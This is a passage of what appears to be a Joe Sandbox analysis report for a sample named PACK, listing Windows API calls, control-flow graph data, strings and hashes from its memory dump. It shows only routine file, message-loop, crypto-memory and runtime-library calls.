                                                                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 002F9A49
                                                                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 002F9A80
                                                                                                                                                • Part of subcall function 002F1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,002EACFE,?,?,?,002EACAD,?,-00000002,?,00000000,?), ref: 002F1426
                                                                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 002F9A70
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                              • String ID: @Uxu$EDIT
                                                                                                                                              • API String ID: 4243998846-59804995
                                                                                                                                              • Opcode ID: 0d5b35aaa923685322d5ac50281fce5e21eecd7c9ba3b8f0c3f4736a37985c11
                                                                                                                                              • Instruction ID: 38914b90b622dbff30146750cc27b175a0e2d628e95fa58bdd6107843b8c667a
                                                                                                                                              • Opcode Fuzzy Hash: 0d5b35aaa923685322d5ac50281fce5e21eecd7c9ba3b8f0c3f4736a37985c11
                                                                                                                                              • Instruction Fuzzy Hash: BFF0E232A1022C77E7319A649C05FFBB76C9B8AB80F440166BF01F30C0D7609A5286F6

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 946 2ee7e3-2ee7ea 947 2ee81f-2ee820 946->947 948 2ee7ec-2ee7fa call 2efcfd 946->948 951 2ee7fc-2ee818 GetProcAddress * 2 948->951 952 2ee81b 948->952 951->952 952->947
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002EFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002EFD18
                                                                                                                                                • Part of subcall function 002EFCFD: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,002EE7F6,Crypt32.dll,?,002EE878,?,002EE85C,?,?,?,?), ref: 002EFD3A
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 002EE802
                                                                                                                                              • GetProcAddress.KERNEL32(00327350,CryptUnprotectMemory), ref: 002EE812
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                              • API String ID: 2141747552-1753850145
                                                                                                                                              • Opcode ID: 03b6e26e2b86bd6043dc5ae17c68ed37f505d1f07dab003e831e685604d31979
                                                                                                                                              • Instruction ID: d373c062c235919c746b2d8581a413f690c43ca7cfaeb3c3b7c2d5602b82e79a
                                                                                                                                              • Opcode Fuzzy Hash: 03b6e26e2b86bd6043dc5ae17c68ed37f505d1f07dab003e831e685604d31979
                                                                                                                                              • Instruction Fuzzy Hash: 45E04FB0950683AACB069F369808682FBA46F18700F10C126E414D31A5DBF4D0B0CB60

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 953 2e9768-2e9789 call 2fd940 956 2e978b-2e978e 953->956 957 2e9794 953->957 956->957 958 2e9790-2e9792 956->958 959 2e9796-2e97b3 957->959 958->959 960 2e97bb-2e97c5 959->960 961 2e97b5 959->961 962 2e97ca-2e97e9 call 2e6ef9 960->962 963 2e97c7 960->963 961->960 966 2e97eb 962->966 967 2e97f1-2e980f CreateFileW 962->967 963->962 966->967 968 2e9873-2e9878 967->968 969 2e9811-2e9833 GetLastError call 2eb32c 967->969 971 2e987a-2e987d 968->971 972 2e9899-2e98ad 968->972 977 2e9835-2e9857 CreateFileW GetLastError 969->977 978 2e9862-2e9867 969->978 971->972 974 2e987f-2e9893 SetFileTime 971->974 975 2e98af-2e98c2 call 2efab1 972->975 976 2e98c7-2e98d2 972->976 974->972 975->976 980 2e985d-2e9860 977->980 981 2e9859 977->981 978->968 982 2e9869 978->982 980->968 980->978 981->980 982->968
APIs
• CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,002E76F2,?,00000005,?,00000011), ref: 002E9804
• GetLastError.KERNEL32(?,?,002E76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002E9811
• CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,002E76F2,?,00000005,?), ref: 002E9846
• GetLastError.KERNEL32(?,?,002E76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002E984E
• SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,002E76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002E9893
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: File$CreateErrorLast$Time
• String ID:
• API String ID: 1999340476-0

Control-flow Graph (function 2fa388-2fa3e0; interactive graph and edge list not reproduced)
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002FA399
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002FA3AA
• IsDialogMessageW.USER32(000104A4,?), ref: 002FA3BE
• TranslateMessage.USER32(?), ref: 002FA3CC
• DispatchMessageW.USER32(?), ref: 002FA3D6
Similarity
• API ID: Message$DialogDispatchPeekTranslate
• String ID:
• API String ID: 1266772231-0

Control-flow Graph (function 2ee862-2ee909; interactive graph and edge list not reproduced)
APIs
  • Part of subcall function 002EE7E3: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 002EE802
  • Part of subcall function 002EE7E3: GetProcAddress.KERNEL32(00327350,CryptUnprotectMemory), ref: 002EE812
• GetCurrentProcessId.KERNEL32(?,?,?,002EE85C), ref: 002EE8E3
Similarity
• API ID: AddressProc$CurrentProcess
• String ID: CryptProtectMemory failed$CryptUnprotectMemory failed$Ps2
• API String ID: 2190909847-3876034067

Control-flow Graph
APIs
  • Part of subcall function 002EFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002EFD18
  • Part of subcall function 002EFCFD: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,002EE7F6,Crypt32.dll,?,002EE878,?,002EE85C,?,?,?,?), ref: 002EFD3A
• OleInitialize.OLE32(00000000), ref: 002F9AB9
• GdiplusStartup.GDIPLUS(?,?,00000000), ref: 002F9AF0
• SHGetMalloc.SHELL32(003275C0), ref: 002F9AFA
Similarity
• API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
• String ID: riched20.dll
• API String ID: 3498096277-3360196438

Control-flow Graph (function 2e964a-2e96de; interactive graph and edge list not reproduced)
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 002E965A
• ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 002E9672
• GetLastError.KERNEL32 ref: 002E96A4
• GetLastError.KERNEL32 ref: 002E96C3
Similarity
• API ID: ErrorLast$FileHandleRead
• String ID:
• API String ID: 2244327787-0

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00302E0F,00000000,00000000,?,003099D3,00302E0F,00000000,00000000,00000000,?,00309BD0,00000006,FlsSetValue), ref: 00309A5E
• GetLastError.KERNEL32(?,003099D3,00302E0F,00000000,00000000,00000000,?,00309BD0,00000006,FlsSetValue,00316058,00316060,00000000,00000364,?,003085E8), ref: 00309A6A
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,003099D3,00302E0F,00000000,00000000,00000000,?,00309BD0,00000006,FlsSetValue,00316058,00316060,00000000), ref: 00309A78
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                              • Opcode ID: 7dcb832b55dcb4b2dc0cc4cf42e0ebe3aa7f7de34794fde70ef9b588aa06a483
                                                                                                                                              • Instruction ID: 360b4ff5cb4b7ffe6102300d5cd4e16f715e8bb706bb0230059fa3dbb86480a2
                                                                                                                                              • Opcode Fuzzy Hash: 7dcb832b55dcb4b2dc0cc4cf42e0ebe3aa7f7de34794fde70ef9b588aa06a483
                                                                                                                                              • Instruction Fuzzy Hash: 9F01F736746223ABC7238B689C54B977B9CAF497A0B114622FD06D71C2D730D810C6E0
APIs
• Part of subcall function 0030A446: GetOEMCP.KERNEL32(00000000,?,?,0030A6CF,?), ref: 0030A471
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0030A714,?,00000000), ref: 0030A8E7
• GetCPInfo.KERNEL32(00000000,0030A714,?,?,?,0030A714,?,00000000), ref: 0030A8FA
Strings
Similarity
• API ID: CodeInfoPageValid
• String ID: S#~>
• API String ID: 546120528-2989149754
APIs
• GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0030A543
Strings
Similarity
• API ID: Info
• String ID: $S#~>
• API String ID: 1807457897-289487991
APIs
• GetProcAddress.KERNEL32(00000000,?), ref: 003099F0
• __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003099FD
Strings
Similarity
• API ID: AddressProc__crt_fast_encode_pointer
• String ID: S#~>
• API String ID: 2279764990-2989149754
APIs
• CreateThread.KERNEL32(00000000,00010000,Function_0001062F,?,00000000,00000000), ref: 002F0519
• SetThreadPriority.KERNEL32(?,00000000), ref: 002F0560
• Part of subcall function 002E6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002E6CEC
Strings
Similarity
• API ID: Thread$CreatePriority__vswprintf_c_l
• String ID: CreateThread failed
• API String ID: 2655393344-3849766595
APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,31E85006,00000001,?,000000FF), ref: 00309CD5
Strings
Similarity
• API ID: String
• String ID: LCMapStringEx$S#~>
• API String ID: 2568140703-4185913858
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00309291), ref: 00309C4D
Strings
Similarity
• API ID: CountCriticalInitializeSectionSpin
• String ID: InitializeCriticalSectionEx$S#~>
• API String ID: 2593887523-3087656813
                                                                                                                                              APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: Alloc
• String ID: FlsAlloc$S#~>
• API String ID: 2773662609-1079930703
APIs
• GetStdHandle.KERNEL32(000000F5,?,?,002EC90A,00000001,?,?,?,00000000,002F4AF4,?,?,?,?,?,002F4599), ref: 002E9C4F
• WriteFile.KERNEL32(?,00000000,?,002F47A1,00000000,?,?,00000000,002F4AF4,?,?,?,?,?,002F4599,?), ref: 002E9C8F
• WriteFile.KERNEL32(?,00000000,?,002F47A1,00000000,?,00000001,?,?,002EC90A,00000001,?,?,?,00000000,002F4AF4), ref: 002E9CBC
Similarity
• API ID: FileWrite$Handle
• String ID:
• API String ID: 4209713984-0
APIs
• CreateDirectoryW.KERNEL32(?,00000000,?,?,?,002E9DFE,?,00000001,00000000,?,?), ref: 002E9F19
• CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,002E9DFE,?,00000001,00000000,?,?), ref: 002E9F4C
• GetLastError.KERNEL32(?,?,?,?,002E9DFE,?,00000001,00000000,?,?), ref: 002E9F69
Similarity
• API ID: CreateDirectory$ErrorLast
• String ID:
• API String ID: 2485089472-0
APIs
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 002FC8FC
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FC915
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 002FC920
Similarity
• API ID: ObjectSingleWait$MessagePeek
• String ID:
• API String ID: 1965964400-0
Similarity
• API ID: H_prolog
• String ID: CMT
• API String ID: 3519838083-2756464174
APIs
• __EH_prolog.LIBCMT ref: 002E1D66
  • Part of subcall function 002E399D: __EH_prolog.LIBCMT ref: 002E39A2
Similarity
• API ID: H_prolog
• String ID: CMT
• API String ID: 3519838083-2756464174
APIs
  • Part of subcall function 002F1432: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,?,00000000,?,002EAB7B,?,?,00000000,?,?,?), ref: 002F1484
  • Part of subcall function 002F9A8D: SetCurrentDirectoryW.KERNEL32(?,002F9CE4,C:\Program Files\VS Revo Group\Revo Uninstaller Pro,00000000,003285FA,00000006), ref: 002F9A91
• SHFileOperationW.SHELL32(?,?,?,?,?,003285FA,00000006), ref: 002F9D36
Strings
• C:\Program Files\VS Revo Group\Revo Uninstaller Pro, xrefs: 002F9CDA
Similarity
• API ID: CompareCurrentDirectoryFileOperationString
• String ID: C:\Program Files\VS Revo Group\Revo Uninstaller Pro
• API String ID: 3543741193-2410753234
APIs
• try_get_function.LIBVCRUNTIME ref: 0030282F
                                                                                                                                              Similarity
                                                                                                                                              • API ID: try_get_function
                                                                                                                                              • String ID: FlsAlloc
                                                                                                                                              • API String ID: 2742660187-671089009
                                                                                                                                              • Opcode ID: f909c9e46bc2d2cd75d844cba3daae60a8b8f9f2080ddf18938d7b000d702463
                                                                                                                                              • Instruction ID: 498a2838d2a1dc12e90e8d6bdb34fc06212ce286349973027a5ea35b7e6daab3
                                                                                                                                              • Opcode Fuzzy Hash: f909c9e46bc2d2cd75d844cba3daae60a8b8f9f2080ddf18938d7b000d702463
                                                                                                                                              • Instruction Fuzzy Hash: 83D02E3678232CB3C91732C4AC06AEBBE088B04BB1F020472FF0C25282D8A288B003C1
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 002FD7D1
  • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
  • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
Strings
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: @Uxu
• API String ID: 1269201914-397286711
• Opcode ID: 1e8d4b3dc085b325d8f485853ce92d19dea03ae0058c71596309325f0d3e7f75
• Instruction ID: e7c28f55118ecccb4416344c51f08b5cf9af630a1b43ee91f3e35a6b61d39046
• Opcode Fuzzy Hash: 1e8d4b3dc085b325d8f485853ce92d19dea03ae0058c71596309325f0d3e7f75
• Instruction Fuzzy Hash: A7B0128927D108FD310E21806D02CB6831FC2C5F56330C53AF101C4088D4804DD10072
APIs
Similarity
• API ID: _memcmp_strlen
• String ID:
• API String ID: 2682527083-0
• Opcode ID: 3d08641e980d69e625634e8e02d798a51ae55842b5efb60c040b4d7eb3c6c822
• Instruction ID: 4e5bc472ae39c2c5a7bf66b10d306d26fb4060e2c6e7bc39a0586d6e401b5458
• Opcode Fuzzy Hash: 3d08641e980d69e625634e8e02d798a51ae55842b5efb60c040b4d7eb3c6c822
• Instruction Fuzzy Hash: 4C5119B25143496BDB21DE50CC89FDBB3ECAB84340F00093DFA89C7152DA35A664CBA1
APIs
• __EH_prolog.LIBCMT ref: 002E1382
  • Part of subcall function 002E5E99: __EH_prolog.LIBCMT ref: 002E5E9E
  • Part of subcall function 002EC4CA: __EH_prolog.LIBCMT ref: 002EC4CF
  • Part of subcall function 002EC4CA: new.LIBCMT ref: 002EC512
  • Part of subcall function 002EC4CA: new.LIBCMT ref: 002EC536
• new.LIBCMT ref: 002E13FA
  • Part of subcall function 002EAD1B: __EH_prolog.LIBCMT ref: 002EAD20
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 7bec92257f671c2838faa4471a6fdaf8d2ca3e803846fd63b6fc9c04ed79765d
• Instruction ID: ef1c58959ee2bc370b4135a2ed71d153bc323528631056b695ccbd308cab461a
• Opcode Fuzzy Hash: 7bec92257f671c2838faa4471a6fdaf8d2ca3e803846fd63b6fc9c04ed79765d
• Instruction Fuzzy Hash: 9E4147B0955B449ED724CF7A84859E6FBE5FF18300F90493ED5EE83282CB726564CB21
APIs
• __EH_prolog.LIBCMT ref: 002E1382
  • Part of subcall function 002E5E99: __EH_prolog.LIBCMT ref: 002E5E9E
  • Part of subcall function 002EC4CA: __EH_prolog.LIBCMT ref: 002EC4CF
  • Part of subcall function 002EC4CA: new.LIBCMT ref: 002EC512
  • Part of subcall function 002EC4CA: new.LIBCMT ref: 002EC536
• new.LIBCMT ref: 002E13FA
  • Part of subcall function 002EAD1B: __EH_prolog.LIBCMT ref: 002EAD20
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 50d664aae946421bfded4ad26035cfd4c1f7ba062ac965e937824ece68de7f3d
• Instruction ID: 6ecc4ede37cfb57402965b1cbf9c2b01935fdb21d8493a6728e6aff42c95846f
• Opcode Fuzzy Hash: 50d664aae946421bfded4ad26035cfd4c1f7ba062ac965e937824ece68de7f3d
• Instruction Fuzzy Hash: 424167B0915B449ED724CF7984859E6FBE5FF18300F80493ED6EE83282CB326564CB21
APIs
  • Part of subcall function 00308516: GetLastError.KERNEL32(?,003200E0,00303394,003200E0,?,?,00302E0F,?,?,003200E0), ref: 0030851A
  • Part of subcall function 00308516: _free.LIBCMT ref: 0030854D
  • Part of subcall function 00308516: SetLastError.KERNEL32(00000000,?,003200E0), ref: 0030858E
  • Part of subcall function 00308516: _abort.LIBCMT ref: 00308594
  • Part of subcall function 0030A7D1: _abort.LIBCMT ref: 0030A803
  • Part of subcall function 0030A7D1: _free.LIBCMT ref: 0030A837
  • Part of subcall function 0030A446: GetOEMCP.KERNEL32(00000000,?,?,0030A6CF,?), ref: 0030A471
• _free.LIBCMT ref: 0030A72A
• _free.LIBCMT ref: 0030A760
Similarity
• API ID: _free$ErrorLast_abort
• String ID:
• API String ID: 2991157371-0
• Opcode ID: d874d2225aae97a372b3f66b6a9912e24036a93b33f62c18d3ebc03812bf3489
• Instruction ID: 0d87384631e57600f33a8a5b20a5c0f89606a0dab85f12be003953d8086361aa
• Opcode Fuzzy Hash: d874d2225aae97a372b3f66b6a9912e24036a93b33f62c18d3ebc03812bf3489
• Instruction Fuzzy Hash: 6531E231905704AFDB12EFA8E861BADB7F4EF41760F268099E5049F2E1EB719E40CB51
APIs
• CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,002E9BF3,?,?,002E76AC), ref: 002E95B0
• CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,002E9BF3,?,?,002E76AC), ref: 002E95E5
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: c5372fd7a1a913dc32b57891e0b0078e5ff5b828cb619bca706aab43afd36f9e
• Instruction ID: 6c82a8e01493bce4985b671ad6421f34463bbad8de91e3168fe48498fab44202
• Opcode Fuzzy Hash: c5372fd7a1a913dc32b57891e0b0078e5ff5b828cb619bca706aab43afd36f9e
• Instruction Fuzzy Hash: D32128B1454389AFE7318F15C845BA777ECEB49364F80492EF5D5821D1C374AC988A60
APIs
• FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,002E738C,?,?,?), ref: 002E9A98
• SetFileTime.KERNEL32(?,?,?,?), ref: 002E9B48
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$BuffersFlushTime
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1392018926-0
                                                                                                                                              • Opcode ID: 96e26c38e44a0180c69b6efe91b436e4b735a73dfd695ba2ff440caaf337b27f
                                                                                                                                              • Instruction ID: 3f263901edcf7036813681d4c747e9703510ad976d406d830d7f0176dd788d8d
                                                                                                                                              • Opcode Fuzzy Hash: 96e26c38e44a0180c69b6efe91b436e4b735a73dfd695ba2ff440caaf337b27f
                                                                                                                                              • Instruction Fuzzy Hash: 5721D6312A82C6AFC711DF26D491AABBBD8AF55304F44492EB8C1C7241D725DD98CBA1
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 002E9B8D
                                                                                                                                              • GetLastError.KERNEL32 ref: 002E9B99
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                              • Opcode ID: baa59061897ef881c67fe2b4e391d4392ef7771c60ca79d07c63c5e96dffabb0
                                                                                                                                              • Instruction ID: 3a6387a25d3f5b8602bc45ba5a0b9e3f30c27fc0c3121beff6dd2652aa9af940
                                                                                                                                              • Opcode Fuzzy Hash: baa59061897ef881c67fe2b4e391d4392ef7771c60ca79d07c63c5e96dffabb0
                                                                                                                                              • Instruction Fuzzy Hash: 1601F9707602416FD734DE2AEC4876B73D9AB84318F90863FB142C76C0DA70DC58C611
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNEL32(000000FF,?,?,?), ref: 002E9957
                                                                                                                                              • GetLastError.KERNEL32 ref: 002E9964
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                              • Opcode ID: 6db26deb168b8233862b4804dd757ce2c0b5d67aa82abeb971d511eb2547c531
                                                                                                                                              • Instruction ID: ea201ca3c40f55f4448ba8efaaf606c50ec68f44cb027327c2cc96def6f26d66
                                                                                                                                              • Opcode Fuzzy Hash: 6db26deb168b8233862b4804dd757ce2c0b5d67aa82abeb971d511eb2547c531
                                                                                                                                              • Instruction Fuzzy Hash: 5301D8722701829B8F19CE278C846BF776DAF45330785461FED26CB252DB71DCB19660
                                                                                                                                              APIs
                                                                                                                                              • _free.LIBCMT ref: 00307B99
                                                                                                                                                • Part of subcall function 00307A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00302FA6,?,0000015D,?,?,?,?,00304482,000000FF,00000000,?,?), ref: 00307ABC
                                                                                                                                              • RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,003200E0,002ECB18,?,?,?,?,?,?), ref: 00307BD5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap$_free
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1482568997-0
                                                                                                                                              • Opcode ID: 4c858ef21aaecd5677c4a8b539b81e065923165b654e4491f20659b349860eed
                                                                                                                                              • Instruction ID: 8a73cef2cc32af43f7f348a8226d3f442638815fffaa5e485b8ed65d7fef1d3e
                                                                                                                                              • Opcode Fuzzy Hash: 4c858ef21aaecd5677c4a8b539b81e065923165b654e4491f20659b349860eed
                                                                                                                                              • Instruction Fuzzy Hash: 52F06231E0B1156ADB233A259C65F6F3B5C9F81BB0F164156FC18AA1D0DB70F80091A1
                                                                                                                                              APIs
